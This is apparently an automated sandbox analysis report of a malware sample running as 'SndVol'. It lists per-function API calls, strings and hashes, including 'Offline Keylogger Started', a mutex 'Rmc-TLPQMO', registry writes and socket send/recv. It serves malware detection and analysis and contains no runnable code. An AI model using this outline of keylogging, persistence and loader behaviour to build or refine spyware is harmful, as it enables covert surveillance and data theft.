Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
(64 bit), xrefs: 0041B368
ProductName, xrefs: 0041B2D2
CurrentBuildNumber, xrefs: 0041B31D
(32 bit), xrefs: 0041B36F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-2070987746
Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Function 0040A726 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
String ID:
API String ID: 110482706-0
Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Function 1E6CC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(1E6CC7DD), ref: 1E6CC7E6
GetModuleHandleA.KERNEL32(?,1E6CC7DD), ref: 1E6CC838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1E6CC860

Part of subcall function 1E6CC803: GetProcAddress.KERNEL32(00000000,1E6CC7F4), ref: 1E6CC804
Part of subcall function 1E6CC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC816
Part of subcall function 1E6CC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC82A

Memory Dump Source

Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true

Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction ID: f00c244cfe53bc5d0991bf38eef0cc09ecfc34a912b0c66950108feb05fadb0b
Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction Fuzzy Hash: 36016410A576813CBB1C82740C15ABB6F9EDB23770B930B96E100C709FCAA0C102C3FA

Function 1E6CC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,1E6CC7DD), ref: 1E6CC838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1E6CC860

Part of subcall function 1E6CC7E6: GetModuleHandleA.KERNEL32(1E6CC7DD), ref: 1E6CC7E6
Part of subcall function 1E6CC7E6: GetProcAddress.KERNEL32(00000000,1E6CC7F4), ref: 1E6CC804
Part of subcall function 1E6CC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC816
Part of subcall function 1E6CC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC82A

Memory Dump Source

Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true

Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction ID: e7a5979bc38b991e17d6cffd99fa5c64aefc9430154c05f62e8c1394e1029253
Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction Fuzzy Hash: DA21242241B6C26FEB158BB44C14AA77FDADB13270F5B0B96D040CB18BD6A89446C3A6

Function 1E6CC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,1E6CC7F4), ref: 1E6CC804
VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC816
VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1E6CC7F4,1E6CC7DD), ref: 1E6CC82A
GetModuleHandleA.KERNEL32(?,1E6CC7DD), ref: 1E6CC838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1E6CC860

Memory Dump Source

Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true

Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd

Similarity

API ID: AddressProcProtectVirtual$HandleModule
String ID:
API String ID: 2152742572-0
Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction ID: de372bf4af9b94c69245f3923143aed1e052052585b18f56d5ad02facd9ce1e8
Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction Fuzzy Hash: C0F04010A8B2813CFA1942B41C54EBB6FCECA27230B920B52E100C718FC9A08506C3FA

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
Opcode Fuzzy Hash: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1

Strings

pth_unenc, xrefs: 00413773

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
String ID:
API String ID: 2579639479-0
Opcode ID: 23c73d5540117da574f7f414a8203fc9c15f50faa32e4adc8859767a57badc70
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: 23c73d5540117da574f7f414a8203fc9c15f50faa32e4adc8859767a57badc70
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Function 0040A675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationSizeSleep
String ID:
API String ID: 4068920109-0
Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C4E5

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationReadSize
String ID:
API String ID: 2135649906-0
Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Function 00415AEA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415B0F
GetTickCount.KERNEL32 ref: 00415B86

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@
API String ID: 180926312-604454484
Opcode ID: 5875e57192157b7f6268978a9899f50a85d711365e6b1f67c1b99dbde02be670
Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
Opcode Fuzzy Hash: 5875e57192157b7f6268978a9899f50a85d711365e6b1f67c1b99dbde02be670
Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

Rmc-TLPQMO, xrefs: 0040D069

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: Rmc-TLPQMO
API String ID: 1925916568-210927153
Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON

Download Yara Rule

APIs

send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitsend
String ID:
API String ID: 3963590051-0
Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4

Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
RegCloseKey.KERNEL32(?), ref: 004135F2

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4

Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
RegCloseKey.KERNEL32(00000000), ref: 00413738

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4

Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
RegCloseKey.KERNEL32(?), ref: 00413592

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94

Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4

Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798

Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA

Memory Dump Source

